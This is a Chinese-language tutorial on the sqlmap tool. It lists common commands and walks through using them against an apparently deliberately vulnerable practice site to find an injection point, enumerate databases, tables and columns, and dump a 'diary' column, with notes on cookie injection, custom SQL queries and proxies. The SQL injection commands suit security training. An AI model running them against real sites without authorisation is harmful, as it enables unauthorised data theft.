【SQLMAP】02 实战


一、常用命令
检查注入点 sqlmap -u "http://ooxx.com/a.php?id=1" 
列数据库信息 sqlmap -u "http://ooxx.com/a.php?id=1" --dbs 
指定数据库名列出所有表 sqlmap -u "http://ooxx.com/a.php?id=1" -D dbsname --tables 
指定数据库名表名列出所有字段 sqlmap -u "http://ooxx.com/a.php?id=1" -D dbsname -T tablename --columns 
指定数据库名表名字段dump出指定字段 sqlmap -u "http://ooxx.com/a.php?id=1" -D dbsname -T tablename -C columnname --dump 
cookie 注入      --cookie=COOKIE                 在需要登录的地方,需要登录后的cookie 
执行指定的 SQL 语句 --sql-query=QUERY 
代理注入 --proxy="http://127.0.0.1:8087"
  二、找到目标数据的过程 =>先确定数据在哪个数据库 =>再确定是数据库中的哪一张表 =>确定表里分别有哪些字段 =>最后根据字段来取出指定数据   三、实战 1、检查注入点 sqlmap -u "http://ooxx.com/a.php?id=1" (1)明确目标地址:https://rimovni.exeye.run/kanwaki/diary?id=1 (2)打开sqlmap的快捷方式 (3)输入命令,检查注入点:
python sqlmap.py -u "目标地址"
  2、列数据库信息
sqlmap -u "http://ooxx.com/a.php?id=1" --dbs
python sqlmap.py -u "目标地址" --dbs
3、指定数据库名列出所有表
sqlmap -u "http://ooxx.com/a.php?id=1" -D dbsname --tables
(1)拿到2、查询到的数据库名
// information数据库是预设的数据库一般不在此处
information_schema
twosecu1_vuln_02
(2)替换如下命令中的dbsname
python sqlmap.py -u "目标地址" -D twosecu1_vuln_02 --tables
(3)结果 4、指定 数据库名 表名,列出所有字段
sqlmap -u "http://ooxx.com/a.php?id=1" -D dbsname -T tablename --columns 
(1)拿到3、查询到的数据表名:book、hacker
python sqlmap.py -u "目标地址" -D twosecu1_vuln_02 -T book --columns
python sqlmap.py -u "目标地址" -D twosecu1_vuln_02 -T hacker --columns
(2)结果 5、指定数据库名表名字段dump出指定字段
sqlmap -u "http://ooxx.com/a.php?id=1" -D dbsname -T tablename -C columnname --dump
(1)拿到4、查询到的字段名diary、id(实际场景是破解日记中的内容,so选择diary)
python sqlmap.py -u "目标地址" -D twosecu1_vuln_02 -T hacker -C diary --dump
(2)原文件 6、cookie 注入
--cookie=COOKIE 在需要登录的地方,需要登录后的cookie 
7、执行指定的 SQL 语句
--sql-query=QUERY
8、代理注入
--proxy="http://127.0.0.1:8087"
参考:  https://zhishihezi.net/b/03c82a3d82cdf5a1d066e0e2423e48dd#start